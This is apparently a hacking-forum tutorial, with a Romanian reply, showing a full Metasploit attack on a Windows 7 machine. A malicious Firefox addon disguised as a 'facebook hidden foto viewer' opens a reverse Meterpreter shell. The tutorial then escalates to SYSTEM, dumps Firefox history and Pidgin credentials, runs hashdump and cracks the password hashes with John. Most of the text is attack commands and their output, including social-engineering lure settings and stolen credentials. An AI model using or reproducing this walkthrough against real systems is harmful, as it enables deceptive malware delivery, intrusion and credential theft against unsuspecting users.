Hunting for cred's hashdump, firefox and pidgin

[crossbower]

Mozilla Firefox Bootstrapped Addon

Platform: victim=Windows 7 / attacker=kali linux

Rank: Excellent

Privileged: No / but with payload windows/meterpreter/reverse_tcp YES

Mission : getsystem access with SYSTEM privileges right

get pidgin creds

get hashdump and crack the hash

get firefox history stolen creds

Description:

This exploit dynamically creates a .xpi addon file. The resulting bootstrapped Firefox addon is presented to the victim via a web page.The victim's Firefox browser will pop a dialog asking if they trust the addon. Once the user clicks "install", the addon is installed and executes the payload with full user permissions.As the addon will execute the payload after each Firefox restart, an option can be given to automatically uninstall the addon once the payload has been executed.

References:

https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions

TippingPoint | DVLabs | XPI: The next malware vector?

First steep we starting and run the services and msfconsole

root@kali:~# service postgresql start && service metasploit start && msfconsole

We get searching for firefox_xpi founding an exploit bootstraper addon

msf > search firefox_xpi

Matching Modules
================
exploit/multi/browser/firefox_xpi_bootstrapped_addon  2007-06-27 00:00:00 UTC
excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Executio

will be configuring the exploit:

Basic options:

Name Current Setting

---- ---------------

ADDONNAME HTML5 Rendering Enhancements

SRVHOST The local host to listen on.

SRVPORT The local port to listen on.

URIPATH The URI to use for this exploit

In the video tutorial in configured for facebook-photo viewer

ADDONNAME facebook hidden foto viewer

SRVHOST 192.168.1.19

SRVPORT 80

URIPATH /facebook-photo-viewer.xpi

msf > use exploit/multi/browser/firefox_xpi_bootstrapped_addon
msf exploit(firefox_xpi_bootstrapped_addon) > set ADDONNAME facebook hidden foto viewer
ADDONNAME => facebook hidden foto viewer
msf exploit(firefox_xpi_bootstrapped_addon) > set SRVHOST 192.168.1.19
SRVHOST => 192.168.1.19
msf exploit(firefox_xpi_bootstrapped_addon) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_xpi_bootstrapped_addon) > set URIPATH /facebook-photo-viewer.xpi
URIPATH => /facebook-photo-viewer.xpi
msf exploit(firefox_xpi_bootstrapped_addon) >

Setup a listener payload without official payloads

PAYLOAD windows/meterpreter/reverse_tcp

LHOST 192.168.1.19

LPORT 443

msf exploit(firefox_xpi_bootstrapped_addon) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(firefox_xpi_bootstrapped_addon) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(firefox_xpi_bootstrapped_addon) > set LPORT 443

Setup the available targets

0 Universal (Javascript XPCOM Shell)

1 Windows x86 (Native Payload)

2 Windows x64 (Native Payload)

3 Linux x86 (Native Payload)

4 Linux x64 (Native Payload)

5 Mac OS X PPC (Native Payload

msf exploit(firefox_xpi_bootstrapped_addon) > set TARGETS 1
TARGETS => 1
msf exploit(firefox_xpi_bootstrapped_addon) >exploits -j

And run the exploit and the exploit creates a .xpi addon what we be presented to the victim via a web page .Once the victim clicks "install", the addon is installed and executes the payload with full user permissions.

msf exploit(firefox_xpi_bootstrapped_addon) > exploit
.[*] Exploit running as background job.
.[*] Started reverse handler on 192.168.1.19:443
msf exploit(firefox_xpi_bootstrapped_addon) >
.[*] Using URL: http://192.168.1.19:80/facebook-photo-viewer.xpi
.[*] Server started.[*] 192.168.1.202    firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'..
.[*] 192.168.1.202    firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'..
.[*] Sending stage (769024 bytes) to 192.168.1.202
.[*] Meterpreter session 1 opened (192.168.1.19:443 -> 192.168.1.202:49207) 

Now the game started , hunting for pidgin creds ,hashdump and firefox creds.

Interactive meterpreter with session 1 ,>> getsystem for obtaining access SYSTEM priveliges.

We have searching a service when running on SYSTEM priveliges on the remote system and migrating in this process.I used PID nr 2980

2980 468 svchost.exe x86 0 NT AUTHORITY\SYSTEM

meterpreter > getsystem
...got system (via technique 1).
meterpreter > migrate 2980

meterpreter > migrate 2980
.[*] Migrating from 1560 to 2980..
.[*] Migration completed successfully.
meterpreter >getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Now the system is ready for extracting the creds : firefox ,pidgin and hashdump.

Now put the session opened in background and extract de firefox creds.

Using post exploitasion windows/gather/forensics/browser_history

meterpreter > background[*] Backgrounding session 1...
msf exploit(bypassuac) > use windows/gather/forensics/browser_history
msf post(browser_history) > set SESSION 1
SESSION => 1
msf post(browser_history) > exploit -j

This modules serching cred in firefox ,chrome,skype

[*] Gathering user profiles[*] Checking for Chrome History artifacts...
[-] Chrome History directory not found for redmon[*] Checking for Chrome Archived History artifacts...
[-] Chrome Archived History directory not found for redmon[*] Checking for Skype artifacts...
[-] Skype directory not found for redmon[*] Checking for Firefox artifacts...
[+] Firefox directory found redmon[*] Downloading C:\Users\redmon\AppData\Roaming\Mozilla\Firefox\Pr  ofiles\3dtmxh0g.default\places.sqlite
[+] Firefox artifact file saved to /root/.msf4/local/redmon_Firefox_3dtmxh0g.default_places.sqlite[*] Post module execution completed

DONE

Now we using a exploitasion for pidgin cred's

msf post(browser_history) > use post/multi/gather/pidgin_cred
msf post(pidgin_cred) > set CONTACTS 1
CONTACTS => 1
msf post(pidgin_cred) > set SESSION 1
SESSION => 1
msf post(pidgin_cred) >[*] Checking for Pidgin profile in: C:\Users\redmon\AppData\Roaming[*] Found C:\Users\redmon\AppData\Roaming\.purple[*] Reading accounts.xml file from C:\Users\redmon\AppData\Roaming\.purple[*] Collected the following credentials:[*]     Server: <unknown>:5222[*]     Protocol: prpl-jabber[*]     Username: msftester@exploit.im[*]     Password: unixunix[*] Collected the following contacts:[*]     Buddy Name: wuala@jabber.ru[*]     Alias: wuala[*]     Protocol: prpl-jabber[*]     Account: msftester@exploit.im[*] Post module execution completed

DONE

Now using exploitasion for extract the hashdump and crack it

We need be returned in session opened

msf post(pidgin_cred) > sessions -i 1[*] Starting interaction with 1...
meterpreter >  hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee  :b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe  0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404  ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8  7bdb5fdc5e9cba88547376818d4:::
meterpreter >

NOW cracking the hashes

root@kali:~# echo "Administrator:500:aad3b435b51404eeaad3b435b51404ee  :b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe  0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404  ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed8  7bdb5fdc5e9cba88547376818d4:::
" >> pass.txt

root@kali:~# john --format=nt pass.txt

Loaded 4 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])

123456 (redmon)

iloveyou (Administrator)

DONE

Have fun and thanks for watching and reading my tut's.

http://www.youtube.com/watch?v=0DNBvPTBmow

[Guest Kovalski]

Foarte bun tutorialul, +rep.

In doua cuvinte, cum sa luam access total la pc-ul cuiva doar printr-un addon.